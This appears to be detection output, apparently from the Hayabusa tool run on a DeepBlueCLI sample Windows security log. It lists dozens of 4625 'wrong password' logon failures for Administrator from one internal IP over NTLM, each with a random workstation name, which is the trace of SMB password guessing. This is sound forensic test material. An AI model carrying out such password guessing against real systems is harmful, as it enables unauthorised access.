+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gui98cdQHPgyNOZI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bm4U7TAfsPTEiygC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fDOoaVWVFAMLiA71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qiJeLgInEkHffefo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWyguWQP2iYUArhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vDa3GqsTMMXguFhi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lr0lkAcdnji1zjW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4WfNFd5MkQxaxHGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8hdPhtxP4Ds65yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2BBoWoXWXuRysTx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6GEhZ2BduHwjJj9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GbwEHQCAUJd64LlA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wGfoObbN8ioefyce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iLHhCgHvmOzoLLqG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9KL69y47DMyFOWT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ECuVYiqdMw2dMjT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YJCYumRekD7AREYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0H4OxKzoemZrsosT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSHnvxa0khWdWBVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bJkPp0bghDCPYz52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfHRWGXjCej9HSPb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X42H7EvrvzsRqXWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moo42NdOq30Gnz3T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4NHVYxxDkCOsQw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iPUiW0vFQB405kwS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OtcZ4ymkeLHeU7YJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxZCDKWtqkGJ0dnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f4GGnhttZgmRPRJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gI0j9w45eXEFeex3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BVZ2YRDUAOsNgKxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJfIpxlcwVf7pWga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Oerixd9ODF6fslsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJC5yvrIymYgaHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4schZcUP8Im8Ee1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WotargyGlEq9PBch  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2JSMrPoucOR0nzlD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jr4w4uoF2DVZ5n9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v319oZIaOBpuf542  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GNRTL9BLlGWMx6dA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHlDIOZ9B5uY8Rzz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dr2bvAue8mr5kagX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXBds9GoXr6IZUfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLYuegjXO18lo342  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: To3MMEEvNXKNjKHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N0HCToTmh3ESGBYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nNvBueVo3ANNmSSN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVWOoAG5ermGL2Gl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W7QYJUNPm5b4jprh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PHllwNJvpH3P97cp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tfT8GtafHGYMlkMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nab7wtZfBVkcynsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHiijj7sT9nyqxii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v06kkhqYNOyEHx2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WSTDX16YK5Zgkjxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u6QWEyTrpndCagP0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7iCaXa5SR5IHJnQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DNZhcPd1JaNFZMYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LeOIg10KS60QplWz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: um3Nwo2doDbKJJvz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JuoqbUwc2Nth1xlH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8zKIbeboTLLkC6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kSyKc8igfuYLMekV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LHog0TdOci9CCKBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R5ilFaQlemZUSNun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOJnv9vFdqr2VSQC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rXaoVN7FvJ5rRDUF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kaFCT5QYFfmJpEC1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOdVfL4XUTLp60tC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFQSXjz0JTlkwpBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgAVlnENp6IzRRDr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JLkeKKFVP5vJjPtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqLXdGmr45vGpu3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
